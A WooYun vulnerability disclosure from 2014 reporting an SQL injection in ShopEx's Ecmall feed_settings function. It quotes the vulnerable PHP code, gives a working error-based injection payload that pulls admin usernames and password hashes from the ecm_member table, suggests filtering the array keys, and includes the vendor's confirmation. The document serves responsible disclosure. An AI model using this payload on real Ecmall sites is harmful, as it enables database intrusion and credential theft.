当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065340

漏洞标题:Ecmall SQL Injection 3

相关厂商:ShopEx

漏洞作者: HackBraid

提交时间:2014-06-18 10:37

修复时间:2014-09-16 10:38

公开时间:2014-09-16 10:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-18: 细节已通知厂商并且等待厂商处理中
2014-06-20: 厂商已经确认,细节仅向厂商公开
2014-06-23: 细节向第三方安全合作伙伴开放
2014-08-14: 细节向核心白帽子及相关领域专家公开
2014-08-24: 细节向普通白帽子公开
2014-09-03: 细节向实习白帽子公开
2014-09-16: 细节向公众公开

简要描述:

应该是这里的最后一处了

详细说明:

漏洞原理同 WooYun: Ecmall SQL Injection 2
这次出现在app/member.app.php

/**
     * Feed设置
     *
     * @author Garbin
     * @param
     * @return void
     **/
    function feed_settings()
    {
        
        if (!IS_POST)
        {
            /* 当前位置 */
            $this->_curlocal(LANG::get('member_center'),  'index.php?app=member',
                             LANG::get('feed_settings'));
            /* 当前用户中心菜单 */
            $this->_curitem('my_profile');
            /* 当前所处子菜单 */
            $this->_curmenu('feed_settings');
            $this->_config_seo('title', Lang::get('user_center') . ' - ' . Lang::get('feed_settings'));
            $user_feed_config = $this->visitor->get('feed_config');
            $default_feed_config = Conf::get('default_feed_config');
            $feed_config = !$user_feed_config ? $default_feed_config : unserialize($user_feed_config);
            $buyer_feed_items = array(
                'store_created' => Lang::get('feed_store_created.name'),
                'order_created' => Lang::get('feed_order_created.name'),
                'goods_collected' => Lang::get('feed_goods_collected.name'),
                'store_collected' => Lang::get('feed_store_collected.name'),
                'goods_evaluated' => Lang::get('feed_goods_evaluated.name'),
                'groupbuy_joined' => Lang::get('feed_groupbuy_joined.name')
            );
            $seller_feed_items = array(
                'goods_created' => Lang::get('feed_goods_created.name'),
                'groupbuy_created' => Lang::get('feed_groupbuy_created.name'),
            );
            $feed_items = $buyer_feed_items;
            if ($this->visitor->get('manage_store'))
            {
                $feed_items = array_merge($feed_items, $seller_feed_items);
            }
            $this->assign('feed_items', $feed_items);
            $this->assign('feed_config', $feed_config);
            $this->display('member.feed_settings.html');
        }
        else
        {
            $feed_settings = serialize($_POST['feed_config']); //问题出现在feed_config参数上
            $m_member = &m('member');
            $m_member->edit($this->visitor->get('user_id'), array(
                'feed_config' => $feed_settings,
            ));
            $this->show_message('feed_settings_successfully');
        }
    }

漏洞证明:

http://localhost/ecmall/index.php?app=member&act=feed_settings
post提交数据:

feed_config[1'or (SELECT 1 FROM(SELECT count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))x from information_schema.tables group by x)a)#]=v


管理员账户密码:

ec.jpg

修复方案:

修复同 WooYun: Ecmall SQL Injection 2
对feed_config的key进行危险字符过滤

版权声明:转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-06-20 11:39

厂商回复:

非常感谢您为shopex信息安全做的贡献
该漏洞在新版本中已经修复,请及时更新
非常感谢

最新状态:

暂无